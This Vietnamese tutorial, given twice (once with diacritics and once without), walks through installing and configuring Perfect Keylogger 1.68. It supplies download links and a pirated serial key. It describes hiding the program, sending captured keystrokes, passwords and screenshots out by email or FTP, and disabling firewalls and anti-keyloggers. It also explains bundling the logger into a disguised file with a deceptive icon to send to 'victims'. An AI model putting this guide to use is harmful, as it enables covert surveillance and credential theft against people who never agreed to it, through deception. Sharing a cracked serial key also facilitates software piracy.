Có thể hoàn toàn ẩn vô hình, kể cả đối với tường lửaGiám sát định kì (ảnh chụp màn hình)Chụp các thông tin trên màn hình sau bất cứ cú click chuột nàoBáo cáo log các dòng đã gõ trong mọi chương trìnhGhi lại password ẩn dưới các dấu saoGhi lại các cú nhấn nútTính năng ghi log các websiteBáo cáo log chat AOL/ICQ/AIM/YahooBộ lọc hoạt động onlineKhả năng phát hiện từ khoá và thông báo – cao cấpGhi log clipboardGửi log và ảnh chụp màn hình qua e-mail trong chế độ ẩnLog upload lén lút qua FTPCài đặt/cập nhật/gỡ bỏ từ xaCác file log được mã hoá và có thể bảo vệ bằng mật khẩuTheo dõi mọi người dùng trên PC, thậm chí cả khi bạn không biết mật khẩu của họDễ dàng xem và quản lí logXuất log ra định dạng HTMLCó thể chỉ rõ chương trình cần giám sátHỗ trợ mọi phiên bản Windows, trong đó có Windows XPRất dễ sử dụngDownload:
http://www.remote-logger.com/downloads/i_bpk_trial.exe
Sublink:
http://mega.1280.com/file/2OIRF7M50P/
Key:
Name: the_lighthouse
Serial: SBTY-SOQO-OASV-GFNE
Next – > trọn ” Yes ” next – > next
Các bạn trọn ” Setalth ….. ” để ẩn phần mềm khỏi taskbar
next trọn Finish để hoàn thành phần cài đặt
Sau khi việc cài đặt hoàn tất phần mềm sẽ đòi hỏi các bạn nhập seria number

Giao diện sau khi cài xong!

Sau khi nhập Seria việc cài đặt đã hoàn tất chúng ta bắt đầu cài đặt thông tin điều khiển cho perfect

Kick vào biểu tượng trọn Options.. để vào thư mục cài đặt thông tin cho Keylog
Các bạn làm theo các buớc trên Giao diện

Sau khi trọn các cột bạn nhớ phần ” mặc định để gọi bảng điều khiển keylog ra bằng phím tắt “
Next

Sau khi trọn các mục bạn Set pass cho bảng điều khiển khi gọi ra
Next

Theo tôi mục này bạn không nên để Capture ( quay phim ) vì sẽ làm file gửi về có dung lượng rất lớn
Bây giò chuyển qua muịc cài đặt giữ liệu để email gửi về , đây là mục rất quan trọng , nếu bạn làm lỗi email sẽ ko được gửi về đúng địa chỉ chúng ta mặc định

Ở phần : ” Scheduler ” các bạn trọn khoảng cách thời gian mail gửi về , dánh dấu tất cả các mục trừ mục ” Send only log size … ” la tuy các bạn trọn dung lượng đến đâu mail sẽ gủi về ( theo tôi thì ko trọn mục này )
Lên lịch cho keylog để gửi ghi chép về qua mail ( chú ý đánh dấu vào ô try to send logs… ) Các tùy chọn là do bạn: thời gian gửi mỗi lần, dung lượng mail gửi đi, gửi ghi chép gồm những gì ( hình ảnh, chat logs,…)
Tiếp theo phần ” Delivery ” là mục cốt lõi

Đánh dấu ” Use mail account .. “
Mục ” Sent to ” Các bạn Đánh tên hòm mail nhận thông tin keylog gửi về
Nếu các bạn sử dụng mail server của keylog như mặc định thì chỉ cần gõ địa chỉ email vô ô send to như vậy là được. Tuy nhiên nếu có mail server khác ổn định hơn thì bạn có thể sử dụng mailserver này bằng cách đánh dấu vào ô Use mail acc to send email và sau đó điền đầy đủ thông tin của mail acc vào
Lời khuyên, nếu các bạn không chắc chắn về SMTP, port .. thì tốt nhất chỉ cần điền địa chỉ email của mình vào phần Send to thôi
Sau khi điền xong các bạn chọn Send test ! Keylog sẽ gửi 1 bức mail kiểm tra đến hòm mail bạn đã điền. Nếu thông báo Send thành công tức là email đã được gửi đi.
Thông thường bạn nên chọn Gmail thì tốt hơn và đôi khi có thể gặp trục trặc khi không thể kết nối được với server !
Mục ” SMTP Sever ” Các bạn điền 1 trong những Sever sau
gsmtp183.google.com
gsmtp163.google.com
gmail-smtp-l.google.com
alt2.gmail-smtp-in.l.google.com
alt1.gmail-smtp-in.l.google.com
alt2.gmail-smtp-in.l.google.com
gsmtp163.google.com
gsmtp183.google.com
gmail-smtp-in.l.google.com
Mục ” Port number ” mặc định 25
Mục “Usename ” bạn điền tên đăng nhập của hòm mail thứ 2 ( hòm mail gửi )
Mục “Password ” bạn điền pass đăng nhập hòm mail thứ 2 ( hòm mail gửi )

Mục” Authentication method ” bạn trọn ” None ” rồi ấn Button ” Sent Test ” để thử xem việc cài đặt thông tin có thành công không . Nếu nhận được thông báo ” Test message was sent succesfully . Check your mailbox ” tức là việc cài đặt đã thành công.

Test thành công!
FTP: Đây là chức năng giúp keylog gửi ghi chép về trên host của bạn dưới dạng các file htm và file hình ảnh …Đây là một chức năng khá hay, tỷ lệ gửi thành công cao tuy nhiên rất ít người dùng nó. Alex khuyến khích các bạn sử dụng cái này thay vì send email, tỷ lệ gặp trục trặc rất cao !
Yêu cầu là có 1 host hộ trợ ftp upload ! Bạn điền đầy đủ thông tin về host như hostname ( ex: ftp://vnitnetcenter.org )
user và pw + port để đăng nhập
Ai đã sử dụng các phần mềm ftp upload thì sẽ rõ những thông tin này thôi
Alerts: Bạn có thể tạo 1 list các ký hiệu, từ ngữ … mà khi keylog ghi lại được nó sẽ lập tức thông báo lại cho bạn ! <== ít xài
Targets: Mặc định là keylog sẽ ghi lại toàn bộ hoạt động, tuy nhiên bạn có thể chọn theo dõi 1 vài chương trình nào đó bằng cách đẩy dấu chọn xuống “Enable logging in the following…” sau đó chọn đường dẫn đến file cần theo dõi hoạt động hoặc add title của chương trình vào !

Cái này dùng để theo dõi máy mình luôn
cho nó chạy cùng chương trình nào đó chung với máy để khi khởi động ct đó thì Keylog cũng hoạt động!
“Select the pạckage actions” :
Trong phần what do you want to do ? Có 2 tùy chọn ở trên là tạo file remote để cài đặt mới keylog trên các pc nhận file remote này, lựa chọn thứ 2 ở dưới là tạo file remote để tháo gỡ keylog đã cài trên máy nạn nhân !
Bạn chọn ô trên để tạo file cài đặt !
Ở dưới là Notify me when the remote installation package will be launch => để dấu chọn vào đây keylog sẽ gửi thông báo cho bạn khi đã cài đặt thành công trên pc của victim bằng email hoặc ftp !
Tùy chọn cuối cùng để file remote tự đóng các soft antikeylog, firewall,.. khi hoạt động !
chon xong bạn next để qua bước tiếp theo
“Specify deployment package options”:
Specify the file to combine with the keylog: bạn chọn đường dẫn đến 1 file bất kỳ để kẹp chung với keylog ( file gì cũng được )
Install to the following …: bạn chọn đưòng dẫn đến thư mục mà keylog sẽ được install vào ( ví dụ C:WINDOWS )
sau rùi next và finish là xong, file remote được tạo ra có tên là inst_xxx trong đó xxx là tên file bạn kẹp vô cùng keylog và nằm cùng thư mục với file này !
Bạn có thể upload file này len host, attack vô email để gửi đi !
****
Kết thúc thành công việc cài đặt , chúng ta chuyển sang bước tạo file keylog để gửi cho nạn nhân
Kick vào biểu tượng trọn ” Remote installation “
Next

Đánh dấu mục ” Notify when the installation .. ” rồi
Next

Phần ” Browse ” bạn trọn file đính keylog

Chọn Icon cho file nhúng Trojan! Cái này tuy chỉ là 1 bước nhỏ nhưng khá quan trọng để lừa nạn nhân! nên chọn “thông minh” một chút để lừa. (Chẳng hạn file.exe thì không để kí hiệu Text là gì cả, nhìn là biết “ngụy trang” ngay)

Next -> Next -> Finish . ( file keylog nhận đuọc có tên ” inst_ + tên file gốc đính kèm ” )

Bạn đã hoàn thành việc tạo file keylog và bây giờ chỉ việc gửi cho nạn nhân và chờ đợi email gửi về .
Log: Các bạn có thể view các log mà chương trình ghi được open các file log gửi về để xem.Giao diện view log như sau:

Nguồn: Tổng hợp
Cach cai dat + su dung Perfect Keylogger 1.68
Cac tinh nang:
Co the hoan toan an vo hinh, ke ca doi voi tuong luaGiam sat dinh ki (anh chup man hinh)Chup cac thong tin tren man hinh sau bat cu cu click chuot naoBao cao log cac dong da go trong moi chuong trinhGhi lai password an duoi cac dau saoGhi lai cac cu nhan nutTinh nang ghi log cac websiteBao cao log chat AOL/ICQ/AIM/YahooBo loc hoat dong onlineKha nang phat hien tu khoa va thong bao – cao capGhi log clipboardGui log va anh chup man hinh qua e-mail trong che do anLog upload len lut qua FTPCai dat/cap nhat/go bo tu xaCac file log duoc ma hoa va co the bao ve bang mat khauTheo doi moi nguoi dung tren PC, tham chi ca khi ban khong biet mat khau cua hoDe dang xem va quan li logXuat log ra dinh dang HTMLCo the chi ro chuong trinh can giam satHo tro moi phien ban Windows, trong do co Windows XPRat de su dungDownload:
http://www.remote-logger.com/downloads/i_bpk_trial.exe
Sublink:
http://mega.1280.com/file/2OIRF7M50P/
Key:
Name: the_lighthouse
Serial: SBTY-SOQO-OASV-GFNE
Next – > tron ” Yes ” next – > next
Cac ban tron ” Setalth ….. ” de an phan mem khoi taskbar
next tron Finish de hoan thanh phan cai dat
Sau khi viec cai dat hoan tat phan mem se doi hoi cac ban nhap seria number

Giao dien sau khi cai xong!

Sau khi nhap Seria viec cai dat da hoan tat chung ta bat dau cai dat thong tin dieu khien cho perfect

Kick vao bieu tuong tron Options.. de vao thu muc cai dat thong tin cho Keylog
Cac ban lam theo cac buoc tren Giao dien

Sau khi tron cac cot ban nho phan ” mac dinh de goi bang dieu khien keylog ra bang phim tat “
Next

Sau khi tron cac muc ban Set pass cho bang dieu khien khi goi ra
Next

Theo toi muc nay ban khong nen de Capture ( quay phim ) vi se lam file gui ve co dung luong rat lon
Bay gio chuyen qua muic cai dat giu lieu de email gui ve , day la muc rat quan trong , neu ban lam loi email se ko duoc gui ve dung dia chi chung ta mac dinh

O phan : ” Scheduler ” cac ban tron khoang cach thoi gian mail gui ve , danh dau tat ca cac muc tru muc ” Send only log size … ” la tuy cac ban tron dung luong den dau mail se gui ve ( theo toi thi ko tron muc nay )
Len lich cho keylog de gui ghi chep ve qua mail ( chu y danh dau vao o try to send logs… ) Cac tuy chon la do ban: thoi gian gui moi lan, dung luong mail gui di, gui ghi chep gom nhung gi ( hinh anh, chat logs,…)
Tiep theo phan ” Delivery ” la muc cot loi

Danh dau ” Use mail account .. “
Muc ” Sent to ” Cac ban Danh ten hom mail nhan thong tin keylog gui ve
Neu cac ban su dung mail server cua keylog nhu mac dinh thi chi can go dia chi email vo o send to nhu vay la duoc. Tuy nhien neu co mail server khac on dinh hon thi ban co the su dung mailserver nay bang cach danh dau vao o Use mail acc to send email va sau do dien day du thong tin cua mail acc vao
Loi khuyen, neu cac ban khong chac chan ve SMTP, port .. thi tot nhat chi can dien dia chi email cua minh vao phan Send to thoi
Sau khi dien xong cac ban chon Send test ! Keylog se gui 1 buc mail kiem tra den hom mail ban da dien. Neu thong bao Send thanh cong tuc la email da duoc gui di.
Thong thuong ban nen chon Gmail thi tot hon va doi khi co the gap truc trac khi khong the ket noi duoc voi server !
Muc ” SMTP Sever ” Cac ban dien 1 trong nhung Sever sau
gsmtp183.google.com
gsmtp163.google.com
gmail-smtp-l.google.com
alt2.gmail-smtp-in.l.google.com
alt1.gmail-smtp-in.l.google.com
alt2.gmail-smtp-in.l.google.com
gsmtp163.google.com
gsmtp183.google.com
gmail-smtp-in.l.google.com
Muc ” Port number ” mac dinh 25
Muc “Usename ” ban dien ten dang nhap cua hom mail thu 2 ( hom mail gui )
Muc “Password ” ban dien pass dang nhap hom mail thu 2 ( hom mail gui )

Muc” Authentication method ” ban tron ” None ” roi an Button ” Sent Test ” de thu xem viec cai dat thong tin co thanh cong khong . Neu nhan duoc thong bao ” Test message was sent succesfully . Check your mailbox ” tuc la viec cai dat da thanh cong.

Test thanh cong!
FTP: Day la chuc nang giup keylog gui ghi chep ve tren host cua ban duoi dang cac file htm va file hinh anh …Day la mot chuc nang kha hay, ty le gui thanh cong cao tuy nhien rat it nguoi dung no. Alex khuyen khich cac ban su dung cai nay thay vi send email, ty le gap truc trac rat cao !
Yeu cau la co 1 host ho tro ftp upload ! Ban dien day du thong tin ve host nhu hostname ( ex: ftp://vnitnetcenter.org )
user va pw + port de dang nhap
Ai da su dung cac phan mem ftp upload thi se ro nhung thong tin nay thoi
Alerts: Ban co the tao 1 list cac ky hieu, tu ngu … ma khi keylog ghi lai duoc no se lap tuc thong bao lai cho ban ! <== it xai
Targets: Mac dinh la keylog se ghi lai toan bo hoat dong, tuy nhien ban co the chon theo doi 1 vai chuong trinh nao do bang cach day dau chon xuong “Enable logging in the following…” sau do chon duong dan den file can theo doi hoat dong hoac add title cua chuong trinh vao !

Cai nay dung de theo doi may minh luon
cho no chay cung chuong trinh nao do chung voi may de khi khoi dong ct do thi Keylog cung hoat dong!
“Select the package actions” :
Trong phan what do you want to do ? Co 2 tuy chon o tren la tao file remote de cai dat moi keylog tren cac pc nhan file remote nay, lua chon thu 2 o duoi la tao file remote de thao go keylog da cai tren may nan nhan !
Ban chon o tren de tao file cai dat !
O duoi la Notify me when the remote installation package will be launch => de dau chon vao day keylog se gui thong bao cho ban khi da cai dat thanh cong tren pc cua victim bang email hoac ftp !
Tuy chon cuoi cung de file remote tu dong cac soft antikeylog, firewall,.. khi hoat dong !
chon xong ban next de qua buoc tiep theo
“Specify deployment package options”:
Specify the file to combine with the keylog: ban chon duong dan den 1 file bat ky de kep chung voi keylog ( file gi cung duoc )
Install to the following …: ban chon duong dan den thu muc ma keylog se duoc install vao ( vi du C:WINDOWS )
sau rui next va finish la xong, file remote duoc tao ra co ten la inst_xxx trong do xxx la ten file ban kep vo cung keylog va nam cung thu muc voi file nay !
Ban co the upload file nay len host, attack vo email de gui di !
****
Ket thuc thanh cong viec cai dat , chung ta chuyen sang buoc tao file keylog de gui cho nan nhan
Kick vao bieu tuong tron ” Remote installation “
Next

Danh dau muc ” Notify when the installation .. ” roi
Next

Phan ” Browse ” ban tron file dinh keylog

Chon Icon cho file nhung Trojan! Cai nay tuy chi la 1 buoc nho nhung kha quan trong de lua nan nhan! nen chon “thong minh” mot chut de lua. (Chang han file.exe thi khong de ki hieu Text la gi ca, nhin la biet “nguy trang” ngay)

Next -> Next -> Finish . ( file keylog nhan duoc co ten ” inst_ + ten file goc dinh kem ” )

Ban da hoan thanh viec tao file keylog va bay gio chi viec gui cho nan nhan va cho doi email gui ve .
Log: Cac ban co the view cac log ma chuong trinh ghi duoc open cac file log gui ve de xem.Giao dien view log nhu sau:

Nguon: Tong hop